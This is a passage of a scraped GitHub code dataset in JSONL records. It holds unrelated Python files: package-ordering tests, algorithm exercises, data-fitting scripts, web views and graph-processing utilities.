self.assertTrue(inst1 != inst3) # __ne__ positive (different timestamp)\n self.assertTrue(inst1 != inst4) # __ne__ positive (different rank)\n self.assertFalse(inst1 != inst2) # __ne__ negative\n\n def test_repr(self):\n \"\"\"Validate we can represent a TimestampPackageOrder as a string.\"\"\"\n inst = TimestampPackageOrder(timestamp=1, rank=2)\n self.assertEqual(repr(inst), \"TimestampPackageOrder((1, 2))\")\n\n def test_pod(self):\n \"\"\"Validate we can save and load a TimestampPackageOrder to pod representation.\"\"\"\n self._test_pod(TimestampPackageOrder(timestamp=3001, rank=3))\n\n\nclass TestPackageOrdererList(_BaseTestPackagesOrder):\n \"\"\"Test cases for the PackageOrderList class.\"\"\"\n\n def test_singleton(self):\n \"\"\"Validate we can build a PackageOrderList object from configuration values.\"\"\"\n config.override(\"package_orderers\", [\n {\n \"type\": \"per_family\",\n \"orderers\": [\n {\n \"packages\": [\"python\"],\n \"type\": \"version_split\",\n \"first_version\": \"2.9.9\"\n }\n ]\n }\n ])\n expected = PackageOrderList()\n expected.append(PerFamilyOrder(order_dict={\n \"python\": VersionSplitPackageOrder(Version(\"2.9.9\"))\n }))\n\n # Clear @classproperty cache\n try:\n delattr(PackageOrderList, '_class_property_singleton')\n except 
AttributeError:\n pass\n self.assertEqual(expected, PackageOrderList.singleton)\n\n def test_singleton_novalue(self):\n \"\"\"Validate we can build a PackageOrderList object from empty configuration values.\"\"\"\n config.override(\"package_orderers\", None)\n\n # Clear @classproperty cache\n try:\n delattr(PackageOrderList, '_class_property_singleton')\n except AttributeError:\n pass\n\n self.assertEqual(PackageOrderList(), PackageOrderList.singleton)\n\n def test_pod(self):\n \"\"\"Validate we can save and load a PackageOrdererList to pod representation.\"\"\"\n inst = PackageOrderList((\n VersionSplitPackageOrder(Version(\"2.6.0\")),\n PerFamilyOrder(order_dict={}, default_order=SortedOrder(descending=False))\n ))\n self._test_pod(inst)\n\n\nclass TestPackageOrderPublic(TestBase):\n \"\"\"Additional tests for public symbols in package_order.py\"\"\"\n\n def test_from_pod_old_style(self):\n \"\"\"Validate from_pod is still compatible with the older pod style.\"\"\"\n self.assertEqual(\n VersionSplitPackageOrder(first_version=Version(\"1.2.3\")),\n from_pod((\"version_split\", {\"first_version\": \"1.2.3\"}))\n )\n","repo_name":"AcademySoftwareFoundation/rez","sub_path":"src/rez/tests/test_packages_order.py","file_name":"test_packages_order.py","file_ext":"py","file_size_in_byte":15244,"program_lang":"python","lang":"en","doc_type":"code","stars":844,"dataset":"github-code","pt":"79"} +{"seq_id":"23868616857","text":"#bfs\n\nfrom collections import deque\n\n\nn, m = map(int, input().split())\ngraph= []\nfor i in range(n):\n graph.append(list(map(int, list(input().strip()))))\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, -1, 1]\n\ndef bfs():\n answer = deque()\n answer.append([0, 0, 1])\n visit = [[[0] * 2 for i in range(m)] for i in range(n)]\n visit[0][0][1] = 1\n while answer:\n a, b, w = answer.popleft()\n if a == n - 1 and b == m - 1:\n return visit[a][b][w]\n for i in range(4):\n x = a + dx[i]\n y = b + dy[i]\n if 0 <= x < n and 0 <= y < m:\n if graph[x][y] == 1 and w == 1:\n visit[x][y][0] = visit[a][b][1] + 1\n answer.append([x, y, 0])\n elif graph[x][y] == 0 and visit[x][y][w] == 0:\n visit[x][y][w] = visit[a][b][w] + 1\n answer.append([x, y, w])\n return -1\n\nprint(bfs())","repo_name":"me4n-lee/ALGORITHM_2022-2nd","sub_path":"albun/과제/hw4_2016251040_이민혁/hw4_2.py","file_name":"hw4_2.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6213439484","text":"ROOT_PATH = \"/\"\nSEPARATOR = \"/\"\n\n\ndef format_path(current_path, path, default=None):\n if path:\n path = path.strip()\n\n if not path:\n return default if default else current_path\n\n absolute = path.startswith(ROOT_PATH)\n if not absolute:\n path = SEPARATOR.join((current_path, path))\n\n parts = split_path(path)\n\n result = []\n for part in parts:\n if part == \".\":\n continue\n elif part == \"..\":\n # Up one level\n result = result[:-1]\n else:\n result.append(part)\n\n new_path = ROOT_PATH + SEPARATOR.join(result)\n\n return new_path\n\n\ndef split_path(path):\n if not path:\n return []\n\n return [part for part in path.strip().split(SEPARATOR)\n if part]","repo_name":"m110/climb","sub_path":"climb/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14595713418","text":"#Given two arrays, write a function to compute their intersection.\n\nclass Solution(object):\n def MergeSort(self, nums):\n\n 
current_size = 1\n length_of_nums = len(nums) - 1\n while current_size < length_of_nums:\n left = 0\n while left < length_of_nums:\n mid = min((left+current_size-1), length_of_nums)\n high = min((left + 2*current_size - 1), length_of_nums)\n self.merge(nums, left, mid, high)\n left = left + 2*current_size\n current_size = 2 * current_size\n\n\n def merge(self, nums, low, mid, high):\n left_array = nums[low:mid+1]\n right_array = nums[mid+1:high+1]\n\n left = 0\n right = 0\n counter = low\n\n # Copy smaller element from left array or right array\n while left < len(left_array) and right < len(right_array):\n if left_array[left] <= right_array[right]:\n nums[counter] = left_array[left]\n left += 1\n else:\n nums[counter] = right_array[right]\n right += 1\n counter += 1\n\n #Copy remaining elements of left array\n while left < len(left_array):\n nums[counter] = left_array[left]\n counter += 1\n left += 1\n\n # Copy remaining elements of right array\n while right < len(right_array):\n nums[counter] = right_array[right]\n counter += 1\n right += 1\n\n\nmy_sol = Solution()\n\nnums = [4,2, 3, 1]\nmy_sol.MergeSort(nums)\nprint(nums) #[1,2,3,4]\n\nnums = [1,2,3,4]\nmy_sol.MergeSort(nums)\nprint(nums) #[1,2,3,4]\n","repo_name":"mangalagb/Leetcode","sub_path":"Others/Sorting/BottomUpMergeSort.py","file_name":"BottomUpMergeSort.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5043415907","text":"import re\n\nfrom . import Mod\n\n\nHTML_TAG_REGEX = r\"<(\\w+[^>\\n]*)>\"\n\n\ndef insert_slash_after_opening_tag_names(output, count=1, include = None, exclude = []):\n p1 = re.compile(HTML_TAG_REGEX)\n p2 = re.compile(r\"(\\s*)(\\w+)([\\s\\S]*)\")\n\n if include is not None:\n include = [x.lower() for x in include]\n if exclude is not None:\n exclude = [x.lower() for x in exclude]\n\n def replace_tag_content(tag_content):\n def f(m):\n tag = m.group(2).lower()\n if (include is None and tag not in exclude) or (include is not None and tag in include and tag not in exclude):\n return m.group(1) + m.group(2) + \" \" + \"/\" * count + m.group(3)\n else:\n return m.group(1) + m.group(2) + m.group(3)\n tag_content = p2.sub(f, tag_content)\n return tag_content\n\n output = p1.sub(lambda m: replace_tag_content(m.group()), output)\n return output\n\nmod_insert_slash_after_opening_tag_names = Mod(insert_slash_after_opening_tag_names)","repo_name":"ZwCreatePhoton/htmlmth","sub_path":"htmlmth/mods/html/insert_slash_after_opening_tag_names.py","file_name":"insert_slash_after_opening_tag_names.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"40891106326","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 1 10:54:49 2019\n\n@author: aholm\n\"\"\"\n\nimport numpy as np\nfrom scipy.signal import savgol_filter\nfrom scipy.optimize import curve_fit as cf\nimport pandas as pd\n\ndef gaussian(x, amp, cen, sig, lin, lift):\n return amp * np.exp(-(x-cen)**2 / (2*sig**2)) + lin*x + lift\n\ndef FitSASE(dataset):\n #Fit the SASE region of the spectrum to a Gaussian\n #Import in the well fit seeded specs\n PositiveDataSet = pd.read_pickle('./GoodData/SeedData'+str(dataset)+'.pkl')\n \n Specs = PositiveDataSet['Shot Spec'].values.tolist()\n TrialNum = PositiveDataSet['Spec Number'].values.tolist()\n \n #Smooth out spec in order to reduce noise which is prevalent in the SASE\n smoothlist=[]\n for i in 
range(len(Specs)):\n #savgol process keeps domain intact\n #This number is the number of points to bin together\n average_number = 151\n smooth = savgol_filter(Specs[i],average_number,1)\n smoothlist.append(smooth)\n smoothlist=np.array(smoothlist)\n \n #Initalize lists to populate with fits\n newdomainlist=[]\n valueslist=[]\n fitlist=[]\n r2list=[]\n for i in range(len(smoothlist)):\n #Set bounds to check for maximum to begin fitting process\n lower=100\n upper=1000\n domain = np.arange(lower,upper)\n #Find location of maximum value within this region\n peak = np.argmax(smoothlist[i][domain]) + lower\n guess_x=peak\n #Find domain to fit the gaussian to\n #This looks for when the guassian crosses below some factor of the\n #peak amplitude\n relative_check=0.20\n tolerance=relative_check*smoothlist[i][peak]\n x=0\n while x==0:\n if smoothlist[i][guess_x] >= tolerance:\n guess_x+=-1\n else:\n lower=guess_x\n x=1\n guess_x=peak\n x=0\n while x==0:\n if smoothlist[i][guess_x] >= tolerance:\n guess_x+=1\n else:\n upper=guess_x\n x=1\n newdomain = np.arange(lower,upper)\n newdomainlist.append(newdomain)\n #Initalize Guess parameters\n guess = [50000,peak,100,0,0]\n try:\n #Fit function to gaussian as defined above within domain\n values, covarience = cf(gaussian,newdomain,smoothlist[i][newdomain],p0=guess)\n values[2] = np.abs(values[2])\n valueslist.append(values)\n fit = gaussian(newdomain,values[0],values[1],values[2],values[3],values[4])\n fitlist.append(fit)\n #Calculate R2 value\n residual = np.sum((smoothlist[i][newdomain] - fit)**2)\n total = np.sum((smoothlist[i][newdomain]-np.mean(smoothlist[i][newdomain]))**2)\n r2 = 1 - (residual/total)\n r2list.append(r2)\n except (RuntimeError, TypeError):\n #In case of error, populate with 0s that will be filtered out later\n valueslist.append([0,0,0,0,0])\n fitlist.append(np.zeros(len(newdomain)))\n r2list.append(0)\n #Make into numpy arrays in order allow easier manipulation\n newdomainlist=np.array(newdomainlist)\n valueslist=np.array(valueslist)\n fitlist=np.array(fitlist)\n r2list=np.array(r2list)\n \n #Initalize empty arrays to populate with only good R2 fits\n goodtrial=[]\n goodpositive=[]\n gooddomain=[]\n goodvalues=[]\n goodfit=[]\n goodr2=[]\n \n #Populate arrays with good R2 fits\n for i in range(len(Specs)):\n if r2list[i] >= 0.95:\n goodpositive.append(Specs[i])\n gooddomain.append(newdomainlist[i])\n goodvalues.append(valueslist[i])\n goodfit.append(fitlist[i])\n goodr2.append(r2list[i])\n goodtrial.append(TrialNum[i])\n \n #Split good values into their respective quantities\n SASEPara = np.transpose(goodvalues)\n Amp = SASEPara[0]\n Wave = SASEPara[1]\n Sig = SASEPara[2]\n Xterm = SASEPara[3]\n Constant = SASEPara[4]\n \n #Create Dictionary in which to later convert to a dataframe\n gooddict = {'Spec Number':goodtrial,'Shot Spec':goodpositive,\n 'SASE Domain':gooddomain,'SASE Gaussian Fit':goodfit,\n 'SASE R2':goodr2,'SASE Amplitude':Amp,'SASE Energy':Wave,\n 'SASE Sigma':Sig,'SASE Linear':Xterm,'SASE Constant':Constant}\n \n GoodData = pd.DataFrame.from_dict(gooddict)\n GoodData.to_pickle('./GoodData/SASEData'+str(dataset)+'.pkl')\n return GoodData\n\n","repo_name":"ahol77/DoublePulse","sub_path":"FitSase.py","file_name":"FitSase.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24828930807","text":"\n\ndef build_string_from_list(ll):\n str1 = \"\"\n for ele in ll:\n str1 += \"{}\".format(ele)\n return str1\n\n\n\ndef 
parity_brute_force(x):\n bit = 0\n num_bits = 0\n while x:\n bitmask = 1 << bit\n bit += 1\n if x & bitmask:\n num_bits += 1\n x &= ~bitmask\n\n return num_bits % 2\n\n\ndef calc_two_parity_bits(bit_val):\n\n lv = bit_val and 31\n hv = bit_val and 992\n\n last_bits= str.format(\"{}{}\",parity_brute_force(lv), parity_brute_force(hv))\n print (\"last_bits = \", last_bits)\n return last_bits\n\n\ndef calc_single_parity_bits(bit_val):\n\n last_bits= str.format(\"{}\",parity_brute_force(bit_val))\n print (\"parity bit = \", last_bits)\n return last_bits\n\n\ndef calculate_numer_of_wrong_address(k,alpha):\n if k==1:\n return alpha\n return 2*alpha*calculate_numer_of_wrong_address(k-1,alpha) + alpha\n\n alpha=0.4\n while alpha < 0.8:\n res= calculate_numer_of_wrong_address(2,alpha)\n print(\"alpha {}:\".format(alpha)+ \" r = {}\".format(res))\n alpha += 0.05\n\n for k in range(1,22):\n res = calculate_numer_of_wrong_address(k, 0.5)\n print(\"k {}:\".format(k) + \" r = {}\".format(res))\n\n for k in range(1, 11):\n print (\"for prefix {} p=\".format(k) + \"{}\".format(0.5**(10-k)))\n\n\n # print (\"FP for 640 \")\n\n # for n in range (1,161):\n # rate = 640/n\n # print(\"rate m/n = {}\".format(rate))\n # print (\"for n={} \".format(n) + \"FP = {}\".format((0.6185) ** rate))\n\n\nif __name__ == '__main__':\n link = \"http://www.somesite.com/details.pl?urn=2344\"\n f = urllib.urlopen(link)\n myfile = f.read()\n print(myfile)","repo_name":"segevere/BFLUT","sub_path":"GeneralMethods.py","file_name":"GeneralMethods.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24462948242","text":"from __future__ import absolute_import, print_function\nimport datetime\nfrom systemalib.utils.retry import retry_fn, exponential_sleep\n\n\ndef _rate_limit(_data, fn, *args, **kwargs):\n '''Provides rate limiting logic, but permits shared rate limiting values.\n\n Pass in a dictionary as the first arguement with a value for the 'per_second' key.\n\n Example usage::\n\n from functools import partial\n rate_limit = partial(_rate_limit, _data={'per_second': 2})\n rate_limit(my_func, a, b)\n rate_limit(my_other_func, b, c)\n\n '''\n delay = 1.0 / float(_data.get('per_second'))\n if not _data.get('last_call'):\n _data['last_call'] = datetime.datetime.now() - datetime.timedelta(seconds=delay)\n retries = _data.get('retries', 3)\n\n def func(*args, **kwargs):\n _data['last_call'] = datetime.datetime.now()\n return fn(*args, **kwargs)\n\n retry_fn(retries, 2.0, exponential_sleep, func, *args, **kwargs)\n\n for retry_count in range(1, retries + 1):\n try:\n _data['last_call'] = datetime.datetime.now()\n return fn(*args, **kwargs)\n except Exception as e:\n time.sleep(delay)\n\n print('{}: Retry {} - {}'.format(fn.__name__, retry_count, str(e)))\n # double the wait time\n delay *= 2.0\n print('{}: Too many retries - {}'.format(fn.__name__, str(e)))\n raise e\n","repo_name":"adamlwgriffiths/flask_skeleton","sub_path":"webserver/utils/limit.py","file_name":"limit.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"11055947800","text":"from django.shortcuts import render_to_response, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\n\n\ndef sign_in(request):\n if request.method == \"GET\":\n return render_to_response('login.html')\n 
else:\n # processing signin action\n\n # authenticate & exception handling\n\n # status 未定\n return HttpResponse(status=200)\n\n\n\ndef sign_out(request):\n if request.user.is_authenticated:\n print (\"user has been login\")\n logout(request)\n\n return redirect(\"/\")\n \n\ndef get_user_info(request):\n if request.user.is_authenticated:\n print (request.user.username, request.user.email)\n else:\n print (\"Anoymous user\")\n \n return HttpResponse(status=200)\n","repo_name":"ShareClass/django-oauth-demo","sub_path":"oauth_demo/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13112458345","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport unicodedata\nimport re\n\nimport enum\nimport pandas\nfrom xlsxwriter import utility\n\n\nCSV_RE = re.compile(r'\\s*,\\s*')\nINT_RE = re.compile(r'\\d+')\n\ndef and_concat(conds):\n assert len(conds) > 0\n if len(conds) == 1:\n return conds[0]\n return conds[0] & and_concat(conds[1:])\n\ndef or_concat(conds):\n assert len(conds) > 0\n if len(conds) == 1:\n return conds[0]\n return conds[0] | or_concat(conds[1:])\n\n\ndef all_false_case(frame):\n conds = []\n for column in frame.columns:\n conds.append(frame[column].eq(False))\n return and_concat(conds)\n\n\ndef is_nans(array):\n \"\"\"\n :type array: list of value or pandas.Series\n \"\"\"\n if isinstance(array, pandas.Series):\n return set(array.isnull()) == {True}\n temp = []\n return set([is_nan(x) for x in array]) == {True}\n\ndef is_nan(x):\n \"\"\"\n :type x: any value\n \"\"\"\n if not isinstance(x, float):\n return False\n return pandas.np.isnan(x)\n\n\ndef split(x):\n return CSV_RE.split(x)\n\n\ndef expand_multiple(series):\n index = series.index\n result = (\n expand_base(series)\n .apply(sorted)\n .apply(pandas.Series)\n .reindex(index)\n )\n # Empty special case\n if isinstance(result, pandas.Series):\n return pandas.DataFrame()\n return result\n\ndef expand_multiple_bool(series):\n index = series.index\n result = (\n expand_base(series)\n .apply(lambda x: pandas.Series(1, index=x))\n .reindex(index)\n .fillna(0)\n .astype(bool)\n )\n # Empty special case\n if isinstance(result, pandas.Series):\n return pandas.DataFrame()\n return result\n\n\ndef expand_base(series):\n if len(series) == 0:\n return series\n return (\n series\n .dropna()\n .apply(round_cast)\n .apply(str)\n .apply(text_normalize)\n .str\n .split(r\"\\s*,\\s*\")\n .apply(lambda x: map(int_cast, x))\n .apply(set)\n )\n\n\ndef int_cast(x):\n try:\n return int(x)\n except:\n return x\n\n\ndef round_cast(x):\n if not isinstance(x, float):\n return x\n casted = int_cast(x)\n # 1 == 1.0\n if casted == x:\n return casted\n else:\n return x\n\n\ntext_type = str\n\ndef text_normalize(text):\n return unicodedata.normalize(\"NFKC\", text_type(text))\n\n\ndef parse_csv(text):\n return re.split(r\"\\s*,\\s*\", text)\n\n\ndef unique_list(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if x not in seen and not seen_add(x)]\n\n\nRangeVector = enum.Enum(\"RangeVector\", \"Unknown X Y\")\n\ndef createChartRange(sheetname, rowcols):\n assert(len(rowcols) > 0)\n options = {\n \"row_abs\": True,\n \"col_abs\": True,\n }\n to_cell = lambda y, x: utility.xl_rowcol_to_cell(y, x, **options)\n def to_range(start, end):\n if start == end:\n return to_cell(*start)\n else:\n return \"{}:{}\".format(to_cell(*start), to_cell(*end))\n start = rowcols[0]\n rowcol = 
rowcols[0] # for len(rowcols) == 1\n prev = rowcols[0]\n cells = []\n vec = RangeVector.Unknown\n for rowcol in rowcols[1:]:\n if (prev[0]+1, prev[1]) == rowcol and vec in [RangeVector.Y, RangeVector.Unknown]:\n vec = RangeVector.Y\n elif (prev[0], prev[1]+1) == rowcol and vec in [RangeVector.X, RangeVector.Unknown]:\n vec = RangeVector.X\n else:\n cells.append(to_range(start, prev))\n start = rowcol\n vec = RangeVector.Unknown\n prev = rowcol\n cells.append(to_range(start, rowcol))\n sheetname = sheetname.replace(\"'\", \"''\")\n return \"=({})\".format(\",\".join([\"'{}'!{}\".format(sheetname, x) for x in cells]))\n\ndef normalizeSheetName(sheetname):\n # reserved chars: :\\/?*[]\n sheetname = sheetname.replace(\"[\", \"【\").replace(\"]\", \"】\").replace(\"[\", \"【\").replace(\"]\", \"】\")\n sheetname = re.sub(r\"[:\\\\/\\?\\*:¥/?*]\", \"\", sheetname)\n sheetname = re.sub(r\"\\s\", \"\", sheetname)\n return sheetname\n","repo_name":"mugwort-rc/qsurveytools","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32005213279","text":"from typing import Union\nimport time\nfrom fastapi import Request, FastAPI\nfrom pydantic import BaseModel\nfrom mysql.connector import connect, Error\nimport json\nimport base64\nimport logging\nfrom datetime import datetime\nfrom pytz import timezone\n\n# This program exposes a POST endpoint at /event that is used by the SNS trigger to post info about a SNS event that\n# has passed the source/sensor filter stage, in the request body. The endpoint parses the event info and creates\n# a new db record, including the current time stamp.\n\n\n# This is not used right now..\nclass SNSEvent(BaseModel):\n PayloadId: int\n EventType: str\n Author: str\n EventTimestamp: str\n CustomMessage: Union[str, None] = None\n created_ts = time.time()\n CreatedAtTimestamp = datetime.fromtimestamp(created_ts).strftime('%Y-%m-%d %H:%M:%S')\n\n\napp = FastAPI()\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nconsole = logging.StreamHandler()\n# to also write logs to file:\n# fh = logging.FileHandler('tmp/spam.log')\nconsole.setFormatter(formatter)\n# add the handler to the root logger\nlogger = logging.getLogger('sns-trigger-app')\n# setting up log level must be like this, otherwise it doesn't work or leads to duplicate logs\nlogger.setLevel(logging.INFO)\nlogger.addHandler(console)\n\n\n@app.post(\"/event/\")\nasync def create_db_entry(request: Request):\n\n msg_body = await request.body()\n msg_json = json.loads(msg_body)\n msg_json = json.loads(msg_json['data'])\n\n # This info is added by the event source. We can use the event_type to infer the type of event\n event_id = msg_json['context']['id']\n event_type = msg_json['context']['type']\n\n msg_data_decoded = json.loads(base64.b64decode(msg_json['data']).decode('utf-8'))\n if msg_data_decoded[\"debug_mode\"] == 1:\n logger.info(\"original request body: {0}\".format(msg_body))\n logger.info(\"message data decoded: {0}\".format(msg_data_decoded))\n # don't use this time, this is the timestamp inserted by argo sensor. 
We are interested in the original Timestamp\n # in the message\n # event_ts = msg_json['context']['time']\n\n # connect to the mysql database and insert a record of the following schema:\n # PayloadId, EventType, CustomMessage, Author, EventTimestamp, CreatedAtTimestamp\n\n try:\n with connect(\n host=\"mysql.argo-events\",\n password=\"password\",\n database=\"argo_event_record_db\"\n ) as connection:\n logger.info(\"successfully connected to database\")\n x = connection.cursor()\n # need to be careful of timezone, otherwise the actual time will depend on the timezone of the EC2 instance\n # where this code is running!\n fmt = '%Y-%m-%d %H:%M:%S.%f'\n est = timezone('US/Eastern')\n now_time = datetime.now(est)\n created_at_ts = now_time.strftime(fmt)\n # logger.info(msg_data_decoded[\"body\"][\"Message\"])\n payload_id = msg_data_decoded[\"id\"]\n author = msg_data_decoded[\"author\"]\n custom_message = msg_data_decoded[\"message\"]\n event_ts = msg_data_decoded[\"Timestamp\"] # in UTC, convert to US/East\n event_ts = datetime.strptime(event_ts, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n # converting to EST, so it can be compared with now time, also in EST\n event_ts = event_ts.astimezone(est)\n x.execute(\"\"\"INSERT into argo_event_record (PayloadId, EventType, Author, CustomMessage, EventTimestamp, CreatedAtTimestamp) \\\n values(%s ,%s, %s, %s, %s, %s)\"\"\", (payload_id, event_type, author, custom_message, \\\n event_ts, created_at_ts))\n connection.commit()\n\n except Error as e:\n logger.error(\"failed connecting to database\")\n\n return await request.json()\n\n# Test:curl -X POST \"http://127.0.0.1:8000/event/\" -H \"Content-Type: application/json\" -d '{\"Author\": \"Ankur\", \"PayloadId\": 4, \"EventType\": \"sqs\", \"CustomMessage\": \"tbd\", \"EventTimestamp\": \"2007-03-04T21:08:12Z\"}'\n# on kubernetes\n# kubectl run mycurlpod --image=curlimages/curl -i --tty -- sh\n# if pod is already running:\n# kubectl exec mycurlpod -i --tty -- sh\n# curl -X POST \"http://http-server-svc.argo-events:8000/event/\" -H \"Content-Type: application/json\" -d '{\"Author\": \"Ankur\", \"PayloadId\": 4, \"EventType\": \"sqs\", \"CustomMessage\": \"tbd\", \"EventTimestamp\": \"2007-03-04T21:08:12Z\"}'\n","repo_name":"ankur6ue/argo-events","sub_path":"sns-trigger-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71039018177","text":"from .BaseError import BaseError\nfrom mongoengine import *\nimport hashlib\n\n\nclass ExceptionError(BaseError):\n \"\"\"\n This class represents the most typical scenario of error - when an uncaught exception bubbles to the top.\n \"\"\"\n\n stacktrace = StringField()\n\n source = StringField()\n\n lineNumber = IntField()\n\n columnNumber = IntField()\n\n def computeHash(self):\n hasher = hashlib.sha256()\n hasher.update(bytes(self.stacktrace, \"utf8\"))\n\n return hasher.hexdigest()\n\n\n def generateErrorDescription(self):\n return self.stacktrace\n","repo_name":"genixpro/kwola","sub_path":"kwola/datamodels/errors/ExceptionError.py","file_name":"ExceptionError.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"79"} +{"seq_id":"42818166003","text":"\"\"\"Network graph setup.\"\"\"\n\nimport logging\nimport pandas as pd\nimport numpy as np\nimport networkx as nx\nfrom networkx.classes.graph import Graph\nfrom networkx.classes.digraph import DiGraph\nfrom typing 
import Union\nimport random\nfrom itertools import product\nfrom copy import deepcopy\nfrom sklearn.model_selection import train_test_split\nfrom ast import literal_eval\n\n# Logging text colors\ndef red(text: str):\n return u\"\\u001b[31m{}\\u001b[0m\".format(text)\n\n\ndef blue(text: str):\n return u\"\\u001b[34m{}\\u001b[0m\".format(text)\n\n\n# Graph initialisation\ndef create_train_graph(targets: dict) -> Graph:\n \"\"\"Initialise an undirected NetworkX graph from an adjacency list.\n\n Args:\n targets: training adjacency list as a dictionary, with source nodes as keys\n and target nodes as values.\n\n Returns:\n A NetworkX graph object.\n\n \"\"\"\n sources = list(targets.keys())\n G = nx.Graph()\n for s in sources:\n edges = list(product([s], targets[s]))\n G.add_edges_from(edges)\n return G\n\n\ndef create_train_digraph(targets: dict) -> DiGraph:\n \"\"\"Initialise an directed NetworkX graph from an adjacency list.\n\n Args:\n targets: training adjacency list as a dictionary, with source nodes as keys\n and target nodes as values.\n\n Returns:\n A NetworkX graph object.\n\n \"\"\"\n sources = list(targets.keys())\n G = nx.DiGraph()\n for s in sources:\n edges = list(product([s], targets[s]))\n G.add_edges_from(edges)\n return G\n\n\n# Edge extraction\ndef get_test_edges(edges: pd.DataFrame) -> list:\n \"\"\"Extracts edges from test dataset.\n\n Args:\n edges: a Pandas dataframe with three columns (Id, Source and Sink), where:\n - Id is a unique identifier for the edge.\n - Source is the source node of the edge.\n - Sink is the target node for the edge.\n\n Returns:\n A list of (Source, Sink) tuples representing the edges.\n\n \"\"\"\n return [(str(x.Source), str(x.Sink)) for x in edges.itertuples()]\n\n\ndef get_all_edges(G: Union[Graph, DiGraph]) -> list:\n \"\"\"Extracts all edges from a NetworkX graph..\n\n Args:\n G: a NetworkX undirected or directed graph object.\n\n Returns:\n A list of (Source, Sink) tuples representing the edges.\n\n \"\"\"\n return list(G.edges)\n\n\ndef create_subgraph(\n G: Union[Graph, DiGraph], edges: Union[list, pd.DataFrame]\n) -> Union[Graph, DiGraph]:\n \"\"\"Create a subgraph of a NetworkX graph by hiding a list of edges.\n\n Args:\n G: a NetworkX undirected or directed graph object.\n\n edges: a list of edges to be hidden, OR a Pandas dataframe containing a column\n labelled \"edge\", which will form the edge list.\n\n Returns:\n The corresponding subgraph.\n\n \"\"\"\n if type(edges) == pd.DataFrame:\n edges = edges.edge\n subG = deepcopy(G)\n subG.remove_edges_from(edges)\n return subG\n\n\n# Sample generation\ndef hide_edges(G: Union[Graph, DiGraph], edges: list, parameters: dict) -> dict:\n \"\"\"Remove a random subset of edges from a NetworkX graph.\n\n Args:\n G: a NetworkX undirected or directed graph object.\n\n edges: a list of edges, of which a random subset will be hidden.\n\n parameters: parameters defined in parameters.yml.\n\n Returns:\n A dictionary containing:\n subG: the subgraph of G generated by hiding edges.\n hidden: list of hidden edges.\n\n \"\"\"\n # Generate a random list of edges to hide\n random.seed(parameters[\"seed\"])\n hidden = random.sample(edges, k=parameters[\"setup\"][\"N_hidden\"])\n\n # Create a subgraph by removing edges\n subG = create_subgraph(G, hidden)\n\n return dict(subG=subG, hidden=hidden)\n\n\ndef fake_edges(\n targets: dict, subG: Graph, hidden: list, test: list, parameters: dict\n) -> list:\n \"\"\"Randomly generates fake edges from source nodes to target nodes in a subgraph.\n\n Args:\n targets: 
training adjacency list as a dictionary, with source nodes as keys\n and target nodes as values.\n\n subG: a NetworkX graph object, which is a subgraph of the training network.\n\n hidden: list of hidden edges.\n\n test: list of edges in the test set.\n\n parameters: parameters defined in parameters.yml.\n\n Returns:\n List of source nodes.\n\n \"\"\"\n fakes = []\n sources = list(targets.keys())\n targets = subG.nodes\n np.random.seed(parameters[\"seed\"])\n while len(fakes) < parameters[\"setup\"][\"N_fake\"]:\n s = np.random.choice(sources)\n t = np.random.choice(targets)\n if (\n s != t # no self loops\n and not subG.has_edge(s, t) # edge does not exist in subgraph\n and not (s, t) in hidden # edge has not been hidden\n and not (s, t) in test # edge is not in the test set\n and not (s, t) in fakes # edge has not already been created\n ):\n fakes.append((s, t))\n return fakes\n\n\ndef create_sample(hidden: list, fakes: list) -> pd.DataFrame:\n \"\"\"Creates a Pandas DataFrame with a random ordering of hidden edges and fake edges.\n\n Args:\n hidden: list of hidden edges.\n\n fakes: list of fake edges.\n\n Returns:\n Pandas dataframe with two columns:\n edge: the edge as a tuple in the form (source, sink).\n label: a binary variable taking the value 1 if the edge was hidden and 0\n if it was fake.\n\n \"\"\"\n sample = [(x, 1) for x in hidden] + [(x, 0) for x in fakes]\n np.random.shuffle(sample)\n return pd.DataFrame(sample, columns=[\"edge\", \"label\"])\n\n\ndef self_loop(edge):\n source, sink = edge\n return int(source == sink)\n\n\ndef preprocess_sample(df: pd.DataFrame, test: list) -> pd.DataFrame:\n \"\"\"Import a training sample and format it for data processing.\n\n Args:\n Pandas dataframe with two columns:\n label: a binary variable taking the value 1 if the edge was hidden and 0\n if it was fake.\n edge: the edge as a tuple in the form (source, sink).\n\n test: list of test edges.\n\n Returns:\n Pre-processed Pandas 